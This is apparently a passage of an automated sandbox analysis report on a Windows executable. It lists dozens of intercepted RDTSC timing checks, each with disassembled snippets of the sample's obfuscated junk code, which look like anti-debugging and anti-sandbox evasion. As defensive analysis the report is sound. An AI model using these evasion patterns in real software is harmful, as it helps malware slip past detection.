                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C95A0C second address: C95A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2830CF2D2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C95A21 second address: C95A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE56Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C95E52 second address: C95E5C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2830CF2D26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C963C7 second address: C963D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2830CEE566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C98194 second address: C981DA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CF2D26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F2830CF2D28h 0x00000010 popad 0x00000011 push eax 0x00000012 je 00007F2830CF2D2Eh 0x00000018 jne 00007F2830CF2D28h 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push edi 0x00000023 push eax 0x00000024 push eax 0x00000025 pop eax 0x00000026 pop eax 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jnl 00007F2830CF2D2Ah 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jng 00007F2830CF2D34h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C981DA second address: C9822B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F2830CEE568h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D3780h], eax 0x0000002b push EA991E17h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F2830CEE575h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9822B second address: C98240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CF2D31h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C98240 second address: C98244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C98392 second address: C98399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C985B1 second address: C985B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C98788 second address: C987A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D31h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C987A5 second address: C987AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C987AB second address: C987B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C987B0 second address: C987B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C98DC2 second address: C98DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C99122 second address: C99127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9A1EC second address: C9A1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9A09D second address: C9A0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9A1F1 second address: C9A20F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F2830CF2D2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9A20F second address: C9A213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9BDD2 second address: C9BDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9BB50 second address: C9BB62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F2830CEE568h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9EAA6 second address: C9EABA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2830CF2D26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2830CF2D26h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9EABA second address: C9EABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9F665 second address: C9F669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9F669 second address: C9F685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2830CEE571h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9F685 second address: C9F689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9FEA2 second address: C9FED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F2830CEE568h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F2830CEE56Ch 0x0000001b jc 00007F2830CEE566h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA343F second address: CA3445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA4262 second address: CA42E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2830CEE56Ah 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F2830CEE568h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D32B1h], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F2830CEE568h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c clc 0x0000004d push 00000000h 0x0000004f jns 00007F2830CEE56Bh 0x00000055 push eax 0x00000056 jc 00007F2830CEE574h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA3445 second address: CA346B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F2830CF2D3Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA42E6 second address: CA42EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA346B second address: CA3470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA3470 second address: CA34BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, dx 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ebx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F2830CEE568h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov eax, dword ptr [ebp+122D1531h] 0x0000003c push FFFFFFFFh 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA52B1 second address: CA52BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA4531 second address: CA4535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA52BF second address: CA52C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA4535 second address: CA453F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA6205 second address: CA6209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA5407 second address: CA540B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAAA2A second address: CAAA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D3643h], edi 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2B23h], ecx 0x00000017 push 00000000h 0x00000019 mov ebx, dword ptr [ebp+122D1821h] 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2830CF2D2Ah 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAAA57 second address: CAAA69 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F2830CEE566h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAC981 second address: CAC985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CABCCF second address: CABCEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CEE579h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAC985 second address: CAC98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAC98E second address: CACA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE56Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1F7Ah], esi 0x00000014 mov edi, ecx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F2830CEE568h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 sub di, 9800h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F2830CEE568h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov edi, 69717884h 0x00000058 mov dword ptr [ebp+122D36A7h], edx 0x0000005e xchg eax, esi 0x0000005f jo 00007F2830CEE570h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CACA09 second address: CACA1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F2830CF2D26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CACA1A second address: CACA24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CACA24 second address: CACA2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAE8D3 second address: CAE937 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dword ptr [ebp+122D1F7Ah], edi 0x00000011 push 00000000h 0x00000013 stc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F2830CEE568h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2318h] 0x00000036 jns 00007F2830CEE56Ch 0x0000003c xchg eax, esi 0x0000003d jmp 00007F2830CEE570h 0x00000042 push eax 0x00000043 jl 00007F2830CEE584h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB0848 second address: CB084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAEA90 second address: CAEA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CACB4C second address: CACB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB19B0 second address: CB1A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F2830CEE570h 0x00000010 jmp 00007F2830CEE56Ah 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F2830CEE568h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov ebx, esi 0x00000032 push 00000000h 0x00000034 jmp 00007F2830CEE571h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F2830CEE568h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 sub ebx, 33316136h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push esi 0x00000060 pop esi 0x00000061 pop eax 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1B63 second address: CB1B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1C13 second address: CB1C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2830CEE566h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1C28 second address: CB1C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB3E4E second address: CB3E58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2830CEE56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB6E12 second address: CB6E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFA7 second address: CBDFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFAB second address: CBDFCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Dh 0x00000007 jmp 00007F2830CF2D30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFCC second address: CBDFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFD5 second address: CBDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D2Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFEF second address: CBDFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE13D second address: CBE147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE147 second address: CBE16C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F2830CEE57Fh 0x00000010 jmp 00007F2830CEE573h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE16C second address: CBE170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE170 second address: CBE191 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F2830CEE566h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F2830CEE571h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE2C8 second address: CBE2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE2D2 second address: CBE2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE579h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7769 second address: CC776F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC776F second address: CC778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2830CEE572h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7D11 second address: CC7D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D34h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7E8D second address: CC7E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC8177 second address: CC817D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC83 second address: CCCC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC8B second address: CCCC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2830CF2D26h 0x00000009 jns 00007F2830CF2D26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC9C second address: CCCCA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCCA2 second address: CCCCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCCAE second address: CCCCD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2830CEE579h 0x0000000f jl 00007F2830CEE56Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA12DE second address: CA12E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
